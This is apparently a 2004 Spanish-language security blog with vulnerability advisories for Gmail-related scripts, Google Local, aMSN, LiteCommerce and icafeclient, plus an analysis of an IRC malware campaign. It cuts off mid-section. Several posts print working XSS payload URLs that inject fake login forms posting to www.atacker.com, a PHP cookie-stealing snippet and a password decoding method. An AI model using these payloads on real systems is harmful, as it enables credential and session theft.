Multiples XSS vulnerability in Gfhost "Gmail hosting"
Friday, November 05, 2004#############################################
###### Multiples XSS vulnerability in Gfhost
###### "Gmail hosting"
###### vendor Url:http://gfhost.mybesthost.com/
###### vendor notify: yes vendor respose : NO
####### xploit included: yes
#############################################
GFHost es un script que permite que uses tu cuenta de correo de Gmail para crear una página en la cuál se publicarán todos los archivos adjuntos de tus mensajes que esten guardados bajo algún label en tu cuenta de correo.De esta forma cualquier persona que visite tu página podrá descargar todos estos archivos.
Las categorías que están en la página generada por el programa son los labels que tengas en tu cuenta de correo, es decir, si en tu cuenta de correos tienes dos labels ("musica" y "videos") esas serán las categorías que están en tú página
posee una vulnerabilidad la cual permite tanto spofear el sitio atraves de Cross site scripting (XSS) ,asi mismo un usuario mal intencionado podria llegar a subir un archivo al hoting y desde el ejecutar funciones de php por ejemplo ,o realizar en si ataques de tipo XSS con el fin de obtener por ejemplo el usuario y el password de los usuarios incautos
son varios files los que permiten esta accion
y alguno de esos "xploits" podrias ser estos:
file label.php
http://[target]/label.php?label=%3Cbody%3E%3Cform%20action=
http://www.atacker.com/save.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=
30%3E%3Cbr%3EPassword:%3Cinput%20name=password%20type=
text%20maxlength=30%3E%3Cbr%3E%3Cinput%20name=login%20type=
submit%20value=Login%3E%3C/form%3E%3C/body
file dl.php
http://[Target]/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=config.php
Podemos enviar un archivo a un a categoria determinada(anyfile.php)y despues
usar ese archivo enviado para ejecutar comandos.Los archivos se envian a User_name_account+"Label"@gmail.com
exaple of Anyfile.php
php code to get cookie
$archivo = 'tostada.txt';
$fp = fopen($archivo, "a");
$string = "\n $cookie";
$write = fputs($fp, $string);
fclose($fp);
script to include in the body
location.href="anyfile.php?cookie="+document.cookie+""
atentamente
Lostmon (lostmon@gmail.com)
Thank Ipy she is In my heart
Thanks to http://www.ayuda-internet.net (#Ayuda_Internet) for their support
and thx to Estrella to be my ligth.
--
La curiosidad es lo que hace mover la mente...
Google Local posee agujeros de tipo XSS
##################################################
Google local XSS vulnerability
os: win 2000 sp4 Ie 6.x whith all fixes
vendor url: http://www.google.es/lochp http://local.google.com/
original advisore: http://lostmon.spymac.net/blog/
###################################################
Google Local Te ayuda a buscar en una localizacion en concreto bien sea un provincia o pueblo ,un eterminado local o empresa o otros tipos de busquedas locales.Sin embargo posee alguna falla de seguridad (XSS) si intruducimos una palabra en el cuadro con la etiqueta "que" e introducimos
codigo html en el Form con la etiqueta "donde"este codigo sera ejecutado sin ningun problema.
Una demostracion de esta circunstancia o xploit:
http://www.google.es/local?hl=es&lr=
&q=xx&near=%3Cbody%3E%3Ch1%3EXSS%2520poW
EJEMPLO 1
http://local.google.com/local?hl=es&lr=&q
=lalala&near=%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+hacked
+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1%3E%3C%2Fp%3
E%3Cp%3ENo+les+abandones+%2C+ellos+no+lo+harian%3C%2Fp%3E%3C
img+src%3D%22http%3A%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2F
Gata_Misha_con_cria.jpg%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3
E&btnG=B%C3%BAsqueda
y pq no pedirle usuario y password al usuario incauto ???
http://local.google.com/local?hl=es&lr=&q=cafe
&near=%3Cbody%3E%3Cform%20action%3D%22http%3A%2
F%2Fwww.atacker.com%2Fsave2db.asp%22+method%3D%22
post%22%3EUsername%3A%3Cinput+name%3D%22username%
22+type%3D%22text%22+maxlength%3D%2230%22%3E%3Cbr
%3EPassword%3A%3Cinput+name%3D%22password%22+type%
3D%22text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput
+name%3D%22login%22+type%3D%22submit%22+value%3D%22Login
%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=B%C3%BAsquedasecuritytracker url: http://www.securitytracker.com/alerts/2004/Nov/1012081.html
Atentamente:
Lostmon (Lostmon@Gmail.com)
Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****
--
La curiosidad es lo que hace mover la mente....A Dia de Hoy parece haber sido solucionada esta situacion 05/11/2004
XSS iN Goollery Gmail script for view Photo Galery
##############################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################
Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.
Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.
#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################
#XSS iN Goollery Gmail script for view Photo Galery #
# os-win 2000 sp4 Ie 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php#
#advisore original:http://lostmon.spymac.net/blog/ ####
#OSVDB ID:11318,11319,11320 ,11624
#############################################
Goollery es photo gallery Basado en Gmail. Puedes subir imagenes desde un website. Estas imagenes
seran añadidas automaticamente y guardadas en tu cuenta de Gmail.
Este script posee alguna vulneravilidad que permitiria a un usuario mal intencionado
hacerse con la cookie de seseion o spofear la imagen de la galeria atraves de un agujero
conocido como XSS (Cross site scripting).Este es un ejemplo de explotacion de esa circunstancia.
#######################################
#File viewalbun.php and viewpic.php XSS vunerability #
#######################################
http://[TARGET]/goollery/viewalbum.php?conversation_id=
ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17
Escritura en pagina lo cual nos permitiria spofear el sitio...
http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=
ffee00b71f3931a&btopage=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17
Atentamente:
Lostmon (Lostmon@Gmail.com)
Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****
OSVDB url: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=goollery
Securitytracker url: http://securitytracker.com/alerts/2004/Nov/1012062.html
--
La curiosidad es lo que hace mover la mente
Gmail suit deja ver el password codificado y este puede ser descodificado
Gmail Suit es una aplicacion que ofrece diferentes
utilidades para gmail y añade menus contextuales
a nuestro explorer para poder tanto consultar como enviar
correos a gmail desde dicha suit
Gmail suit una vez instalado deja en la carpeta de usuario
(documents and settingsuser_nameApplication DataGSuit )
crea un archivo llamado settings.xml
si miramos dentro de este archivo vemos varios datos
1- el nombre de usuario de la cuenta de gmail
2- el password codificado de alguna manera
el password codificado tiene la misma longitud de caracteres
que el password en texto plano introducido por el usuario
faltaria saber como descodificarlo que seria tan sencillo como
pasar caracter por caracter a su valor ASCII (http://www.bbsinc.com/symbol.html)
restarle 128 y el resultado mirar en la tabla ASCII y tendremos el caracter
correcto del password
ejemplo:
ì=(236-128)=108 108 = l
otro caracter
á=(225-128)=97 97=a
caracter a caracter podriamos descodificar el password
ìïéóìáîå=loislane
securitytracker url: http://securitytracker.com/alerts/2004/Oct/1011994.html
OSVDB ID : 11176
atentamente:
Lostmon (lostmon@gmail.com)
Thank Ipy and [D]aRk You are The best friends
Thanks to http://www.Ayuda-Internet.net (#Ayuda_Internet) for support
and thx to Estrella to be my ligth.
--
La curiosidad es lo que hace mover la mente....
NEW RELEASE GSuite R14 DATE 30-10-2004
http://kb.imspire.com/support/2004-11-A.html
Gmail deja ver la lista de contactos a un usuario local
Gmail deja ver la lista de contactos a un usuario local
Procedimiento:
Abrimos nuestro navegador, y vamos a la web Http://Gmail.google.com
y tenemos acceso a nuestra cuenta.Escribimos nuestros correos, las actividades y cerramos el navegador,o nuestra sesión, es igual. inmediatamente abrimos a nuestro explorador de Windows, los archivos temporales de Internet y tomamos los archivos temporales de Gmail. Copiamos estos archivos en una carpeta, y entonces con el notepad abrimos los archivos del siguientes:
etc.
Uno de estos archivos contiene la lista con todos nuestros contactos, y cualquiera usuario,mirando nuestros ficheros temporales en esta PC, podría tener acceso y ver a los contactos de nuestros gmail
atentamente
Lostmon (lostmon@gmail.com )
Thanks to LuTRiZiA always in my mind
Thanks to http://www.ayuda-internet.net(#Ayuda_Internet) for support
and thx to Estrella to be my ligth.
La curiosidad es lo que hace mover la mente...
Gmail drive deja ver el nombre de usuario y da acceso a la cuenta de correo
Ante la avalancha de gente que usa la nueva funcionalidad para gmail
gmail drive (http://www.viksoe.dk/code/gmail.htm)Se ha descubierto que un usuario local podria obtener el nombre de usuario con el que se inicio sesion en el disco siva a mi pc , mira las propiedades del disco de Gmail y en la etiqueta de volumen estara el nombre de usuario que inicio sesion en el disco...
Si ademas marcamos la opcion de "auto login" un usuario local ademas podria abrir el navegador, dirigirse a la direccion http://gmail.google.com y al estar ya logeado en el Gmail drive ..seria automaticamente redirigido hacia la cuenta de correo del usuario
Atentamente
Lostmon ( lostmon@gmail.com )
OSVDB ID 10940
http://www.securitytracker.com/alerts/2004/Oct/1011758.html
thx to www.Ayuda-Internet.net for their support
thx to Ghalician he is whith me and investigate :)
La curiosidad es lo que hace mover la mente....
Virus/malware activo por las redes de IRC
Ante la oleada de infeciones producidas por un virus/malware activo en la red de Irc-Hispano,y otras redes, desde #ayuda_internet ,
preocupados por esta infección, que cada dia se esta extendiendo mas ,
decidimos investigar cual podria ser la causa de la situacion e intentar
llegar cuanto antes a una solucion rapida y eficaz para el usuario que visita la red.
Asi os exponemos hoy el resultado de ese análisis o de esa investigación
para asi ...en conocimiento de todos intentemos por lo menos ,no quedar
infectados o si lo estubiesemos intentar desinfectarnos cuanto antes.
Analisis de la situación:
Los que sois asiduos al canal os habreis dado cuenta de que
ultimamente nuestro bot banea muy seguido a una serie de usuarios que
hacen spam por privado...
El motivo no es otro que intentar protegeros de la amenaza de ese
virus ..el "modus operandi" de ese virus es el siguiente:
Entran usuarios con un nick aleatorio a una red de irc ,entran en un
canal o varios y dejan por privado o por el general una url ,el usuario
incauto que clica en ellas,y descarga el programa malware y lo ejecuta
queda infectado.
=============================
url "capturadas" son estas:
=============================
http://hotgirl.such.info If you love amateurs... real amateurs, this
is the best site on the net. Don't wait another second for these porn star wannabe's! CLICK HERE NOW -your ***** will thank you!
http://hardporn.be.tf The most provocative and fantastic ,high tempo
hard porn,fliery *****ing scenes,school girls,crazy lolitas all of them
are in this web
http://smssend.tr.gs Text Message anyone worldwide free with
International SMS Messaging No signup required..! iF you want to send
only click this site..!
http://newmp3s.gen.ms Click Here! Free Downloads AZ, Full Mp3 Albums,
New Mp3 Albums ..
http://freemp3.here.ws Do you want to Listen All of the Singer's New
album and New SingLes..? aLso it Ýs free..! only click This Site..!
Full albums and a Lot of mp3 Free..!
===========================================================
Despues de hacer un seguimiento de las webs e intentar "ver" el
motivo por el cual puede pasar esto y que referencia tiene con esas
webs ,nos damos cuenta de que todas las url llevan a una misma web
desde la cual se descargan archivos con doble extension
La web donde llevan es a esta http://cyprusturk.net/porn/
web que guarda en ese directorio varios archivos exe para descargar,
dependiendo del dominio desde el que se venga algunos ejemplos son estos :
asiavideo.mpeg.exe
sex.mpeg.exe
good.mp3.exe
real.mp3.exe
Lleva a muchos mas con diferentes nombres y diferentes primeras
extensiones,es algo deliverado ,pues se incluye en el exe el icono perteneciente a la extension mpeg o mp3 con lo cual el usuario mediano llegaria a ejecutar esa "pelicula" o ese "mp3" y entonces es cuando el exe es desempaquetado y instalado.Por el analisis de algunas de esos archivos llegamos a la siguiente informacion :
********************************************************************
FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
********************************************************************
File: C:Do*****ents and
SettingsadministradorEscritoriohispanogood.mp3.exe
Date: 13/09/2004 17:47:29
***** General ******************************************************
Location: C:Do*****ents and SettingsadministradorEscritoriohispano
Size: 4823545
Version: 1.6.0.0
CRC-32: 9F6F50FC
MD5: CE6CD747A6C8A62334290EE8E85D5EBB
Read only: No
Hidden: No
System file: No
Directory: No
Archive: Yes
Symbolic link: No
Time stamp: lunes, 13 de septiembre de 2004 17:24:36
Creation: lunes, 13 de septiembre de 2004 17:03:02
Last access: lunes, 13 de septiembre de 2004 17:43:28
Last write: lunes, 13 de septiembre de 2004 17:24:36
***** Version ******************************************************
Supported languages:: Inglés (Estados Unidos) (1033/1252)
--- Version --------------------------------------------------------
File version: 1, 6, 0
Company name: instyler installation software
Internal name: setup.exe
Comments: www.instyler.com info@instyler.com
Legal copyright: Copyright © 2000 Sebastian Brand
Legal trademarks:
Original filename: setup.exe
Product name: instyler ex-it!
Product version: 1, 6, 0
File description: instyler ex-it! Self-Extractor
Private build:
Special build:
***** Resources ****************************************************
--- Cursor ---------------------------------------------------------
1
2
3
4
5
6
--- Bitmap ---------------------------------------------------------
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
CDROM
CLOSEDFOLDER
CURRENTFOLDER
EXECUTABLE
FLOPPY
HARD
KNOWNFILE
NETWORK
OPENFOLDER
RAM
TNEWBEVEL
TNEWGAUGE
UNKNOWNFILE
--- Icon -----------------------------------------------------------
1
2
3
4
--- String Table ---------------------------------------------------
3841
3842
3843
3844
3845
3846
3847
3848
3849
3850
3851
3852
3853
4089
4090
4091
4093
4094
4095
--- RCData ---------------------------------------------------------
TFLIC
TFOLFORM
TINSTALLFORM
TMAINFORM
TPWDFORM
--- Cursor Group ---------------------------------------------------
32762
32763
32764
32765
32766
32767
--- Icon Group -----------------------------------------------------
MAINICON
--- Version Info ---------------------------------------------------
1
--- XP Manifest ----------------------------------------------------
1
?xml version="1.0" encoding="UTF-8" standalone="yes"?
assembly xmlns="urn:schemas-microsoft-com:asm.v1"
manifestVersion="1.0"
assemblyIdentity
name="Your.Application.Name.Here"
processorArchitecture="x86"
version="1.0.0.0"
type="win32"/
description Windows Shell /description
dependency
dependentAssembly
assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="x86"
publicKeyToken="6595b64144ccf1df"
language="*"
dependentAssembly
/dependency
/assembly
***** PE Header ****************************************************
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0008
Time/Date stamp: 2A425E19
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 818F
Magic: 010B
Linker version (major): 02
Linker version (minor): 19
Size of code: 00036A00
Size of initialized data: 0000FC00
Size of uninitialized data: 00000000
Address of entry point: 00037468
Base of code: 00001000
Base of data: 00038000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0001
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 0004E000
Size of headers: 00000400
Checksum: 00000000
Sub system: 0002 - Windows graphical user interface
(GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00004000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010
***** PE Sections **************************************************
CRC-32: ?
MD5: ?
----- PE Sections --------------------------------------------------
Section VirtSize VirtAddr PhysSize PhysAddr Flags
CODE 00036854 00001000 00036A00 00000400 60000020
DATA 00001DE4 00038000 00001E00 00036E00 C0000040
BSS 00002508 0003A000 00000000 00038C00 C0000000
.idata 00001CBA 0003D000 00001E00 00038C00 C0000040
.tls 00000008 0003F000 00000000 0003AA00 C0000000
.rdata 00000018 00040000 00000200 0003AA00 50000040
.reloc 000033D8 00041000 00000000 00000000 50000040
.rsrc 00008A00 00045000 00008A00 0003AC00 50000040
***** Import/Export table ******************************************
--- Export table ---------------------------------------------------
--- Import table (libraries: 12) -----------------------------------
kernel32.dll (imports: 36)
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
WideCharToMultiByte
TlsSetValue
TlsGetValue
SetCurrentDirectoryA
RemoveDirectoryA
MultiByteToWideChar
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetCommandLineA
GetCurrentDirectoryA
ExitThread
CreateThread
CreateDirectoryA
WriteFile
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
MoveFileA
GetStdHandle
GetFileSize
GetFileType
ExitProcess
DeleteFileA
CreateFileA
CloseHandle
user32.dll (imports: 1)
MessageBoxA
oleaut32.dll (imports: 5)
VariantChangeTypeEx
VariantCopyInd
VariantClear
SysStringLen
SysAllocStringLen
advapi32.dll (imports: 6)
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
kernel32.dll (imports: 64)
WriteFile
WinExec
WaitForSingleObject
VirtualAlloc
TerminateThread
SizeofResource
SetFileTime
SetFilePointer
SetFileAttributesA
SetErrorMode
SetCurrentDirectoryA
ResumeThread
ReadFile
MultiByteToWideChar
MulDiv
LockResource
LocalFileTimeToFileTime
LoadResource
LoadLibraryA
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetWindowsDirectoryA
GetVolumeInformationA
GetVersionExA
GetVersion
GetSystemDirectoryA
GetSystemDefaultLCID
GetShortPathNameA
GetProcAddress
GetModuleFileNameA
GetLogicalDrives
GetLocaleInfoA
GetLastError
GetFullPathNameA
GetFileAttributesA
GetExitCodeThread
GetExitCodeProcess
GetEnvironmentVariableA
GetDriveTypeA
GetCurrentThreadId
GetCurrentProcessId
GetCurrentProcess
FreeResource
FreeLibrary
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
DosDateTimeToFileTime
DeleteFileA
CreateThread
CreateProcessA
CreateFileA
CreateDirectoryA
CompareStringA
CloseHandle
mpr.dll (imports: 1)
WNetGetConnectionA
version.dll (imports: 3)
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll (imports: 58)
UnrealizeObject
TextOutA
StretchDIBits
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetEnhMetaFileBits
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
Rectangle
RectVisible
RealizePalette
PlayEnhMetaFile
PatBlt
MoveToEx
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPointA
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetCurrentPositionEx
GetClipBox
GetBitmapBits
ExcludeClipRect
EnumFontsA
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreateRectRgn
CreatePenIndirect
CreatePalette
CreateFontIndirectA
CreateDIBitmap
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll (imports: 135)
WindowFromPoint
WinHelpA
WaitMessage
WaitForInputIdle
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowOwnedPopups
ShowCursor
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClassA
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OffsetRect
OemToCharA
MessageBoxA
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRgn
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetSystemMetrics
GetSystemMenu
GetSysColor
GetSubMenu
GetScrollPos
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableMenuItem
DrawTextA
DrawMenuBar
DrawIcon
DrawFocusRect
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreateWindowExA
CreatePopupMenu
CreateMenu
CreateIcon
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharLowerBuffA
CharLowerA
CharUpperBuffA
AdjustWindowRectEx
comctl32.dll (imports: 12)
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Destroy
ImageList_Create
ole32.dll (imports: 3)
CoCreateInstance
CoUninitialize
CoInitialize
shell32.dll (imports: 1)
ShellExecuteA
********************************************************************
FileAlyzer © 2003 Patrick M. Kolla. All Rights Reserved.
********************************************************************
Estamos en un seguimiento mayor de esta situacion ya que cada vez son
mas los usuarios que dia a dia entran en el irc y dejan el link hacia
la web ...lo que nos hace pensar que sea lo ke sea se esta extendiendo
y deprisa ... pues en apenas dos dias hemos pasado de uno o dos
usuarios o bots que entraban a ya casi los 100 por dia en diferentes
canales.
Despues de observar esta situacion y pensar en que hacer , decidimos
enviar muestras a las casas antivirus (panda,mcaffe,bitdefender,avp y
alguno mas) hasta ahora solo mcaffe contesto a nuestro rekerimiento
,contestando
sobre el archivo de muestra enviado lo siguiente :
==================================
fwd del mail de mcaffe con la respuesta :
==================================
From: Virus Research virus_research@avertlabs.com
Date: Mon, 13 Sep 2004 12:15:50 -0700
Subject: RE: Escalation: 1301426 - Re: posible nuevo virus ???
To: Lostmon lostmon@gmail.com
A.V.E.R.T. Sample Analysis
Issue Number:1301426
Virus Research Analyst: Brant Yaeger
Identified: mrsn.ex ... Found application HideWindow.
ping.hlp ... Found the IRC/Flood.bi trojan !!!
rebot.dll ... Found application IRC/Flood.tool.
Symad.ex ... Found application Tool-WGet.
tuqa.dll ... Found application IRC/Flood.tool.
Windows.icm ... Found the IRC/Flood.dt trojan !!!
zerz.dll ... Found the IRC/Seiseni.worm virus !!!
AVERT(tm) Labs, Beaverton, OR
Thank you for submitting your suspicious files.
Synopsis -
This malware can be identified and removed with our current scanners
(Version 4x Engine 4.2.60 + the current DAT).
In order to get the fastest possible response, you may wish to submit future
virus-samples to http://www.webimmune.net. In most cases it can respond
almost instantly with a solution.
More and more malware threats are taking advantage of open file and printer
shares to spread, without users having to actually execute any files.
If your computer is not networked with other machines, there is no need to
have file and printer sharing installed, so it should be disabled. If your
computer is networked with others, you may need to have some level of file
and printer sharing. In either case, if you are affected by one of these
threats, you may need to adjust your level of file and printer sharing to
take care of the problem.
Please consult with your administrator before making any changes on your
own, if you're on a LAN.
For other virus-related information, please see the AVERT homepage at:
http://vil.mcafeesecurity.com/vil/default.asp
Solution -
If you are using an Engine older than what is current, we strongly recommend
that you upgrade as, in a lot of cases, an old engine will not identify and
remove certain malware (even with a current set of DAT files). So, as well
as DAT files, engines need to be updated to include regular changes and
improvements made to the scanner.
=======================================================
Lo cual en resumidas cuentas dice viene a decir ...que si que hay
codigo virico en esos
programas o esos exe que son descargados...y ademas nos proporcionan
las partes de esos virus o
malware( los payloads),que son los archivos que se instalan en sistema
una vez ejecutado el exe ...
Despues de haber echo algunas pruebas con algun antivirus
por ahora solo mcaffe nos lo ha detectado con el engine 4.x y las
ultimas bases de datos del antivirus ( el dat ke contiene las firmas
de virus).. revisar esta informacion y intentar no clicar en ninguna
web quie no conozcais ,y si por lo ke sea llegais a una de esas webs
ni se os ocurra ejecutar el exe ke se descarga ,si usais opera o otro
navegador que no sea explorer , lo vereis enseguida pues en la ventana
de descarga vereis la doble extension y la ultima sera un exe ..ir
con cuidado.
atentamente:
El equipo de #ayuda_internet
http://www.ayuda-internet.net
La ayuda ..nuestra razón de ser.
Tiendas vistuales basadas en Litecommerce vulnerables
En los ultimos das surgio una vulnerabilidad en postnuke
(http://www.securitytracker.com/alerts/2004/Jul/1010755.html)
despues de leer el advisore y buscar en google con fines estadisticos los posibles sites vulnerables,me di cuenta de que no todos los links ivan a dar digamos a paginas normales en postnuke, si no que algunos de esos link ivan directamente al archivo de instalacion de un tipo de tienda virtual llamada litecommerce (http://www.litecommerce.com/) en una instalacion por defecto ,la tienda deja un archivo llamado 'install.php' como en el bug anterior de postnuke,desde ese archivo podemos iniciar la instalacion de la tienda virtual remotamente.podriamos reconfigurar el site completamente,pass de la base de datos,contenidos dela tienda ,percios y demas.todo seria perfecto si ... en algunas de las interfaces encontradas no pidiera el 'auth code ' es como el serial de proteccion ,para el uso indebido del script.No es en todas las interfaces que pide ese codig ,encontramos versiones 2.0.0 con el form para el code y la misma version,sin el form ,lo cual si permitia la instalacion,y configuracion del sitepara explotar la vulnerabilidad ,bastaria con encuntrar ese archivo ,que suele estar aqui: http://www.hosts.com/install.php http://www.host.com/path_to_shop/install.php
no he tenido acceso a un numero de serie estandar del soft para poder establecer,o decir si con cualkier numero del programa ,podria iniciarse la instalacion en cualkier site que estubiese basado en litecommerce
thx to http://www.ayuda-internet.net/ por su apoyo :)
thx Estrella ya sabes que eres mi luz ;P
thx to Rottew & Lutrizia formamos buena familia no ?? :DD
by lostmon (lostmon@gmail.com)
Securitytracker url: http://securitytracker.com/alerts/2004/Jul/1010778.html
La curiosidad es lo que hace mover la mente
aMNS deja ver los hash de los usuarios
Thursday, November 04, 2004El popular cliente de msn para linux AMSN ahora en sus versiones para windows ;sufre una vulnerabilidad ,atraves de la cual puede un usuario local obtener el hash de la cuenta con la cual se inicio sesion en el programa.Despues de haber observado que el cliente amsn al hacer login en el y recibir un nuevo correo nos sale un sobre en la barra de tareas indicando que ha llegado un nuevomail ;le programa abre una pagina local llamada 'hotlog.htm' la cual contiene el usuario y el password codificado del usuario que inicio sesion en el (hash)aparte de otros datos de importante relevancia.Asi mismo el archivo ?config.xml tambien permitiria ver el password codificado solo y si se marco la opcion de recordar contraseña podriamos tambien obtener el hash y el remote pass de la cuenta con la cual se inicio sesion.
Hasta el momento no se ha recibido ninguna solucion por parte del desarroyador del producto
la explotacion y explicacion de este agujero es por la forma en que guarda la informacion amsn en la maquina;un usuario local mal intencionado podria tener acceso a esos datos ;llevarlos a otra makina y hacer uso de ellos para acceder a esa cuenta.
Links relacionados:
http://www.securitytracker.com/alerts/2004/Jun/1010555.html
http://sourceforge.net/tracker/index.php?func=detail&aid=976450&group_id=54091&atid=472655
http://sourceforge.net/tracker/index.php?func=detail&aid=979793&group_id=54091&atid=472655"
OSVDB ID :8123and 15049
atentamente
Lostmon (lostmon@gmail.com)
Thnx to estrella she is :) she ?...
--
la curiosidad es lo que hace mover la mente...
Multiples vulnerabilidades en el software icafeclient
#################################################
######## multiples vulnerabilidades en el software icafeclient
######## vendor Url:http://www.mitsoftware.com/
###### 1-donde se han realizado las pruebas
###### 2- explicacion del uso del programa
###### 3- repoduccion de los bugs
###### 4- agradecimientos.
###### OSVDB ID: 8105
###### Secunia:SA12101
#################################################
###################################
1-donde se han realzado las pruebas
###################################Para testear estas vulnerabilidades se ha usadoSistema: win98 se con todos los hotfix-icafecli v 2.6 rv 2004.72
Vendor http://www.mitsoftware.com/ xploit: no es necesario xploit###################################2- explicacion del software###################################I-cafe es un programa para la gestion de cybercafes,es un programabasado en cliente/servidor,el cual permite la gestion de usuarios,programas que se pueden ejecutar en el pc y propone algunas opcionesde seguridad.El software en concreto posee una interfaz desde la cual se tiene acceso alos programas que el admin digamos ,deja usar,asi no podemos ejecutarlosdirectamente,nada mas que por la interfaz del programa.El programa trabaja con usuarios y passwords (socios),con tiempos de codigospredefinidos,(time code) o bien por tiempo abierto(time play) en el cual se pagacuando finaliza la sesion ,por tiempo usado.###################################3- reproduccion de los bugs###################################3.1-cerrar el programa y evitar su ejecucion:El programa es cargado como servicio,para ello se incluye en el registroHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ahy añade un valor de cadena I-Cafe Client y con el valor del pathdonde este guardado.El programa en el caso del test lo pusimos en C:\protegido\ICAFECLI.EXEpodemos hacer dos cosas primera seria reiniciar el pc y cuando entra en windows,antes de que salte el programa icafe,podemos hacer ctrl+alt+supr buscar el procesollamado icafecli y finalizarlose iniciara el pc y no tendremos el soft de gestion corriendo...despues , si el soft no ha impuesto las restricciones podemos ademas borrar la clave deregistro que hace la llamada al programa para su ejecucion.En el servidor se vera como pc inactivo,pero para ello el admin debera actualizar la sala.3.2-saltarse la restriccion de acceso al disco duro:
